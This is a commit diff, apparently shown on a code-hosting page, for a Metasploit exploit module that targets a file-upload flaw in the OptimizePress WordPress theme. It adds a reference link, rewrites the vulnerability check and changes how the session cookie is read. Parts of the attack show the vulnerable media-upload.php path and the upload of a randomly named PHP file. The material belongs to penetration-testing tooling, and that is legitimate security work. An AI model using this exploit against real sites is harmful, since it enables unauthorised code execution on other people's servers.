Updated
parent
045b848a30
commit
57b7d89f4d
|
@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
|
@ -42,10 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
if not res or res.code != 200
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res and res.code == 200
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
#set cookie
|
||||
cookie = res.headers['Set-Cookie']
|
||||
cookie = res.get_cookies
|
||||
|
||||
filename = rand_text_alphanumeric(8) + ".php"
|
||||
|
||||
|
|
Loading…
Reference in New Issue